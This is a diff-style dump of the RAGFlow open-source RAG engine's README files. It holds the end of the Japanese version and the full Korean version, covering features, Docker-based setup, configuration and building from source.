+ - 2024-12-04 ナレッジ ベースへのページランク スコアをサポートしました。
62
+ - 2024-11-22 エージェントでの変数の定義と使用法を改善しました。
63
+ - 2024-11-01 再現の精度を向上させるために、解析されたチャンクにキーワード抽出と関連質問の生成を追加しました。
64
+ - 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
65
+
66
+ ## 🎉 続きを楽しみに
67
+
68
+ ⭐️ リポジトリをスター登録して、エキサイティングな新機能やアップデートを最新の状態に保ちましょう!すべての新しいリリースに関する即時通知を受け取れます! 🌟
69
+
70
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
71
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
72
+ </div>
73
+
74
+ ## 🌟 主な特徴
75
+
76
+ ### 🍭 **"Quality in, quality out"**
77
+
78
+ - 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
79
+ - 無限のトークンから"干し草の山の中の針"を見つける。
80
+
81
+ ### 🍱 **テンプレートベースのチャンク化**
82
+
83
+ - 知的で解釈しやすい。
84
+ - テンプレートオプションが豊富。
85
+
86
+ ### 🌱 **ハルシネーションが軽減された根拠のある引用**
87
+
88
+ - 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
89
+ - 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
90
+
91
+ ### 🍔 **多様なデータソースとの互換性**
92
+
93
+ - Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
94
+
95
+ ### 🛀 **自動化された楽な RAG ワークフロー**
96
+
97
+ - ��人から大企業まで対応できる RAG オーケストレーション(orchestration)。
98
+ - カスタマイズ可能な LLM とエンベッディングモデル。
99
+ - 複数の想起と融合された再ランク付け。
100
+ - 直感的な API によってビジネスとの統合がシームレスに。
101
+
102
+ ## 🔎 システム構成
103
+
104
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
105
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
106
+ </div>
107
+
108
+ ## 🎬 初期設定
109
+
110
+ ### 📝 必要条件
111
+
112
+ - CPU >= 4 cores
113
+ - RAM >= 16 GB
114
+ - Disk >= 50 GB
115
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
116
+ > ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
117
+
118
+ ### 🚀 サーバーを起動
119
+
120
+ 1. `vm.max_map_count` >= 262144 であることを確認する:
121
+
122
+ > `vm.max_map_count` の値をチェックするには:
123
+ >
124
+ > ```bash
125
+ > $ sysctl vm.max_map_count
126
+ > ```
127
+ >
128
+ > `vm.max_map_count` が 262144 より大きい値でなければリセットする。
129
+ >
130
+ > ```bash
131
+ > # In this case, we set it to 262144:
132
+ > $ sudo sysctl -w vm.max_map_count=262144
133
+ > ```
134
+ >
135
+ > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
136
+ >
137
+ > ```bash
138
+ > vm.max_map_count=262144
139
+ > ```
140
+
141
+ 2. リポジトリをクローンする:
142
+
143
+ ```bash
144
+ $ git clone https://github.com/infiniflow/ragflow.git
145
+ ```
146
+
147
+ 3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
148
+
149
+ > 以下のコマンドは、RAGFlow Docker イメージの v0.16.0-slim エディションをダウンロードします。異なる RAGFlow エディションの説明については、以下の表を参照してください。v0.16.0-slim とは異なるエディションをダウンロードするには、docker/.env ファイルの RAGFLOW_IMAGE 変数を適宜更新し、docker compose を使用してサーバーを起動してください。例えば、完全版 v0.16.0 をダウンロードするには、RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0 と設定します。
150
+
151
+ ```bash
152
+ $ cd ragflow
153
+ $ docker compose -f docker/docker-compose.yml up -d
154
+ ```
155
+
156
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
157
+ | ----------------- | --------------- | --------------------- | ------------------------ |
158
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
159
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
160
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
161
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
162
+
163
+ 4. サーバーを立ち上げた後、サーバーの状態を確認する:
164
+
165
+ ```bash
166
+ $ docker logs -f ragflow-server
167
+ ```
168
+
169
+ _以下の出力は、システムが正常に起動したことを確認するものです:_
170
+
171
+ ```bash
172
+ ____ ___ ______ ______ __
173
+ / __ \ / | / ____// ____// /____ _ __
174
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
175
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
176
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
177
+
178
+ * Running on all addresses (0.0.0.0)
179
+ * Running on http://127.0.0.1:9380
180
+ * Running on http://x.x.x.x:9380
181
+ INFO:werkzeug:Press CTRL+C to quit
182
+ ```
183
+
184
+ > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
185
+
186
+ 5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
187
+ > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
188
+ 6. [service_conf.yaml.template](./docker/service_conf.yaml.template) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
189
+
190
+ > 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
191
+
192
+ _これで初期設定完了!ショーの開幕です!_
193
+
194
+ ## 🔧 コンフィグ
195
+
196
+ システムコンフィグに関しては、以下のファイルを管理する必要がある:
197
+
198
+ - [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する���
199
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): バックエンドのサービスを設定します。
200
+ - [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
201
+
202
+ [.env](./docker/.env) ファイルの変更が [service_conf.yaml.template](./docker/service_conf.yaml.template) ファイルの内容と一致していることを確認する必要があります。
203
+
204
+ > [./docker/README](./docker/README.md) ファイル ./docker/README には、service_conf.yaml.template ファイルで ${ENV_VARS} として使用できる環境設定とサービス構成の詳細な説明が含まれています。
205
+
206
+ デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
207
+
208
+ > すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
209
+ >
210
+ > ```bash
211
+ > $ docker compose -f docker/docker-compose.yml up -d
212
+ > ```
213
+
214
+ ### Elasticsearch から Infinity にドキュメントエンジンを切り替えます
215
+
216
+ RAGFlow はデフォルトで Elasticsearch を使用して全文とベクトルを保存します。[Infinity]に切り替え(https://github.com/infiniflow/infinity/)、次の手順に従います。
217
+
218
+ 1. 実行中のすべてのコンテナを停止するには:
219
+ ```bash
220
+ $ docker compose -f docker/docker-compose.yml down -v
221
+ ```
222
+ 2. **docker/.env** の「DOC \_ ENGINE」を「infinity」に設定します。
223
+
224
+ 3. 起動コンテナ:
225
+ ```bash
226
+ $ docker compose -f docker/docker-compose.yml up -d
227
+ ```
228
+ > [!WARNING]
229
+ > Linux/arm64 マシンでの Infinity への切り替えは正式にサポートされていません。
230
+
231
+ ## 🔧 ソースコードで Docker イメージを作成(埋め込みモデルなし)
232
+
233
+ この Docker イメージのサイズは約 1GB で、外部の大モデルと埋め込みサービスに依存しています。
234
+
235
+ ```bash
236
+ git clone https://github.com/infiniflow/ragflow.git
237
+ cd ragflow/
238
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
239
+ ```
240
+
241
+ ## 🔧 ソースコードをコンパイルした Docker イメージ(埋め込みモデルを含む)
242
+
243
+ この Docker のサイズは約 9GB で、埋め込みモデルを含むため、外部の大モデルサービスのみが必要です。
244
+
245
+ ```bash
246
+ git clone https://github.com/infiniflow/ragflow.git
247
+ cd ragflow/
248
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
249
+ ```
250
+
251
+ ## 🔨 ソースコードからサービスを起動する方法
252
+
253
+ 1. uv をインストールする。すでにインストールされている場合は、このステップをスキップしてください:
254
+
255
+ ```bash
256
+ pipx install uv
257
+ ```
258
+
259
+ 2. ソースコードをクローンし、Python の依存関係をインストールする:
260
+
261
+ ```bash
262
+ git clone https://github.com/infiniflow/ragflow.git
263
+ cd ragflow/
264
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
265
+ ```
266
+
267
+ 3. Docker Compose を使用して依存サービス(MinIO、Elasticsearch、Redis、MySQL)を起動する:
268
+
269
+ ```bash
270
+ docker compose -f docker/docker-compose-base.yml up -d
271
+ ```
272
+
273
+ `/etc/hosts` に以下の行を追加して、**conf/service_conf.yaml** に指定されたすべてのホストを `127.0.0.1` に解決します:
274
+
275
+ ```
276
+ 127.0.0.1 es01 infinity mysql minio redis
277
+ ```
278
+
279
+ 4. HuggingFace にアクセスできない場合は、`HF_ENDPOINT` 環境変数を設定してミラーサイトを使用してください:
280
+
281
+ ```bash
282
+ export HF_ENDPOINT=https://hf-mirror.com
283
+ ```
284
+
285
+ 5. バックエンドサービスを起動する:
286
+
287
+ ```bash
288
+ source .venv/bin/activate
289
+ export PYTHONPATH=$(pwd)
290
+ bash docker/launch_backend_service.sh
291
+ ```
292
+
293
+ 6. フロントエンドの依存関係をインストールする:
294
+ ```bash
295
+ cd web
296
+ npm install
297
+ ```
298
+ 7. フロントエンドサービスを起動する:
299
+
300
+ ```bash
301
+ npm run dev
302
+ ```
303
+
304
+ _以下の画面で、システムが正常に起動したことを示します:_
305
+
306
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
307
+
308
+ ## 📚 ドキュメンテーション
309
+
310
+ - [Quickstart](https://ragflow.io/docs/dev/)
311
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
312
+ - [References](https://ragflow.io/docs/dev/category/references)
313
+ - [FAQ](https://ragflow.io/docs/dev/faq)
314
+
315
+ ## 📜 ロードマップ
316
+
317
+ [RAGFlow ロードマップ 2025](https://github.com/infiniflow/ragflow/issues/4214) を参照
318
+
319
+ ## 🏄 コミュニティ
320
+
321
+ - [Discord](https://discord.gg/4XxujFgUN7)
322
+ - [Twitter](https://twitter.com/infiniflowai)
323
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
324
+
325
+ ## 🙌 コントリビュート
326
+
327
+ RAGFlow はオープンソースのコラボレーションによって発展して���ました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./CONTRIBUTING.md)をご覧ください。
ragflow-main/README_ko.md ADDED
@@ -0,0 +1,327 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow란?
44
+
45
+ [RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
46
+
47
+ ## 🎮 데모
48
+
49
+ 데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 업데이트
57
+
58
+ - 2025-02-05 'SILICONFLOW' 모델 목록을 업데이트하고 Deepseek-R1/DeepSeek-V3에 대한 지원을 추가합니다.
59
+ - 2025-01-26 지식 그래프 추출 및 적용을 최적화하고 다양한 구성 옵션을 제공합니다.
60
+ - 2024-12-18 Deepdoc의 문서 레이아웃 분석 모델 업그레이드.
61
+ - 2024-12-04 지식베이스에 대한 페이지랭크 점수를 지원합니다.
62
+
63
+ - 2024-11-22 에이전트의 변수 정의 및 사용을 개선했습니다.
64
+ - 2024-11-01 파싱된 청크에 키워드 추출 및 관련 질문 생성을 추가하여 재현율을 향상시킵니다.
65
+ - 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
66
+
67
+ ## 🎉 계속 지켜봐 주세요
68
+
69
+ ⭐️우리의 저장소를 즐겨찾기에 등록하여 흥미로운 새로운 기능과 업데이트를 최신 상태로 유지하세요! 모든 새로운 릴리스에 대한 즉시 알림을 받으세요! 🌟
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
73
+ </div>
74
+
75
+ ## 🌟 주요 기능
76
+
77
+ ### 🍭 **"Quality in, quality out"**
78
+
79
+ - [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
80
+ - 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
81
+
82
+ ### 🍱 **템플릿 기반의 chunking**
83
+
84
+ - 똑똑하고 설명 가능한 방식.
85
+ - 다양한 템플릿 옵션을 제공합니다.
86
+
87
+ ### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
88
+
89
+ - 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
90
+ - 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
91
+
92
+ ### 🍔 **다른 종류의 데이터 소스와의 호환성**
93
+
94
+ - 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
95
+
96
+ ### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
97
+
98
+ - 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
99
+ - 구성 가능한 LLM 및 임베딩 모델.
100
+ - 다중 검색과 결합된 re-ranking.
101
+ - 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
102
+
103
+ ## 🔎 시스템 아키텍처
104
+
105
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
106
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
107
+ </div>
108
+
109
+ ## 🎬 시작하기
110
+
111
+ ### 📝 사전 준비 사항
112
+
113
+ - CPU >= 4 cores
114
+ - RAM >= 16 GB
115
+ - Disk >= 50 GB
116
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
117
+ > 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](<(https://docs.docker.com/engine/install/)>)를 참조하세요.
118
+
119
+ ### 🚀 서버 시작하기
120
+
121
+ 1. `vm.max_map_count`가 262144 이상인지 확인하세요:
122
+
123
+ > `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
124
+ >
125
+ > ```bash
126
+ > $ sysctl vm.max_map_count
127
+ > ```
128
+ >
129
+ > 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 쟈설정하세요.
130
+ >
131
+ > ```bash
132
+ > # 이 경우에 262144로 설정했습니다.:
133
+ > $ sudo sysctl -w vm.max_map_count=262144
134
+ > ```
135
+ >
136
+ > 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
137
+ >
138
+ > ```bash
139
+ > vm.max_map_count=262144
140
+ > ```
141
+
142
+ 2. 레포지토리를 클론하세요:
143
+
144
+ ```bash
145
+ $ git clone https://github.com/infiniflow/ragflow.git
146
+ ```
147
+
148
+ 3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
149
+
150
+ > 아래 명령어는 RAGFlow Docker 이미지의 v0.16.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.16.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.16.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0로 설정합니다.
151
+
152
+ ```bash
153
+ $ cd ragflow
154
+ $ docker compose -f docker/docker-compose.yml up -d
155
+ ```
156
+
157
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
158
+ | ----------------- | --------------- | --------------------- | ------------------------ |
159
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
160
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
161
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
162
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
163
+
164
+ 4. 서버가 시작된 후 서버 상태를 확인하세요:
165
+
166
+ ```bash
167
+ $ docker logs -f ragflow-server
168
+ ```
169
+
170
+ _다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
171
+
172
+ ```bash
173
+ ____ ___ ______ ______ __
174
+ / __ \ / | / ____// ____// /____ _ __
175
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
176
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
177
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
178
+
179
+ * Running on all addresses (0.0.0.0)
180
+ * Running on http://127.0.0.1:9380
181
+ * Running on http://x.x.x.x:9380
182
+ INFO:werkzeug:Press CTRL+C to quit
183
+ ```
184
+
185
+ > 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network anormal` 오류가 발생할 수 있습니다.
186
+
187
+ 5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
188
+ > 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
189
+ 6. [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
190
+
191
+ > 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
192
+
193
+ _이제 쇼가 시작됩니다!_
194
+
195
+ ## 🔧 설정
196
+
197
+ 시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
198
+
199
+ - [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
200
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): 백엔드 서비스를 구성합니다.
201
+ - [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
202
+
203
+ [.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일의 내용과 일치하도록 해야 합니다.
204
+
205
+ > [./docker/README](./docker/README.md) 파일 ./docker/README은 service_conf.yaml.template 파일에서 ${ENV_VARS}로 사용할 수 있는 환경 설���과 서비스 구성에 대한 자세한 설명을 제공합니다.
206
+
207
+ 기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
208
+
209
+ > 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
210
+ >
211
+ > ```bash
212
+ > $ docker compose -f docker/docker-compose.yml up -d
213
+ > ```
214
+
215
+ ### Elasticsearch 에서 Infinity 로 문서 엔진 전환
216
+
217
+ RAGFlow 는 기본적으로 Elasticsearch 를 사용하여 전체 텍스트 및 벡터를 저장합니다. [Infinity]로 전환(https://github.com/infiniflow/infinity/), 다음 절차를 따르십시오.
218
+
219
+ 1. 실행 중인 모든 컨테이너를 중지합니다.
220
+ ```bash
221
+ $docker compose-f docker/docker-compose.yml down -v
222
+ ```
223
+ 2. **docker/.env**의 "DOC_ENGINE" 을 "infinity" 로 설정합니다.
224
+ 3. 컨테이너 부팅:
225
+ ```bash
226
+ $docker compose-f docker/docker-compose.yml up -d
227
+ ```
228
+ > [!WARNING]
229
+ > Linux/arm64 시스템에서 Infinity로 전환하는 것은 공식적으로 지원되지 않습니다.
230
+
231
+ ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함하지 않음)
232
+
233
+ 이 Docker 이미지의 크기는 약 1GB이며, 외부 대형 모델과 임베딩 서비스에 의존합니다.
234
+
235
+ ```bash
236
+ git clone https://github.com/infiniflow/ragflow.git
237
+ cd ragflow/
238
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
239
+ ```
240
+
241
+ ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함)
242
+
243
+ 이 Docker의 크기는 약 9GB이며, 이미 임베딩 모델을 포함하고 있으므로 외부 대형 모델 서비스에만 의존하면 됩니다.
244
+
245
+ ```bash
246
+ git clone https://github.com/infiniflow/ragflow.git
247
+ cd ragflow/
248
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
249
+ ```
250
+
251
+ ## 🔨 소스 코드로 서비스를 시작합니다.
252
+
253
+ 1. uv를 설치하거나 이미 설치된 경우 이 단계를 건너뜁니다:
254
+
255
+ ```bash
256
+ pipx install uv
257
+ ```
258
+
259
+ 2. 소스 코드를 클론하고 Python 의존성을 설치합니다:
260
+
261
+ ```bash
262
+ git clone https://github.com/infiniflow/ragflow.git
263
+ cd ragflow/
264
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
265
+ ```
266
+
267
+ 3. Docker Compose를 사용하여 의존 서비스(MinIO, Elasticsearch, Redis 및 MySQL)를 시작합니다:
268
+
269
+ ```bash
270
+ docker compose -f docker/docker-compose-base.yml up -d
271
+ ```
272
+
273
+ `/etc/hosts` 에 다음 줄을 추가하여 **conf/service_conf.yaml** 에 지정된 모든 호스트를 `127.0.0.1` 로 해결합니다:
274
+
275
+ ```
276
+ 127.0.0.1 es01 infinity mysql minio redis
277
+ ```
278
+
279
+ 4. HuggingFace에 접근할 수 없는 경우, `HF_ENDPOINT` 환경 변수를 설정하여 미러 사이트를 사용하세요:
280
+
281
+ ```bash
282
+ export HF_ENDPOINT=https://hf-mirror.com
283
+ ```
284
+
285
+ 5. 백엔드 서비스를 시작합니다:
286
+
287
+ ```bash
288
+ source .venv/bin/activate
289
+ export PYTHONPATH=$(pwd)
290
+ bash docker/launch_backend_service.sh
291
+ ```
292
+
293
+ 6. 프론트엔드 의존성을 설치합니다:
294
+ ```bash
295
+ cd web
296
+ npm install
297
+ ```
298
+ 7. 프론트엔드 서비스를 시작합니다:
299
+
300
+ ```bash
301
+ npm run dev
302
+ ```
303
+
304
+ _다음 인터페이스는 시스템이 성공적으로 시작되었음을 나타냅니다:_
305
+
306
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
307
+
308
+ ## 📚 문서
309
+
310
+ - [Quickstart](https://ragflow.io/docs/dev/)
311
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
312
+ - [References](https://ragflow.io/docs/dev/category/references)
313
+ - [FAQ](https://ragflow.io/docs/dev/faq)
314
+
315
+ ## 📜 로드맵
316
+
317
+ [RAGFlow 로드맵 2025](https://github.com/infiniflow/ragflow/issues/4214)을 확인하세요.
318
+
319
+ ## 🏄 커뮤니티
320
+
321
+ - [Discord](https://discord.gg/4XxujFgUN7)
322
+ - [Twitter](https://twitter.com/infiniflowai)
323
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
324
+
325
+ ## 🙌 컨트리뷰션
326
+
327
+ RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./CONTRIBUTING.md)을 검토해 주세요.
ragflow-main/README_pt_br.md ADDED
@@ -0,0 +1,354 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
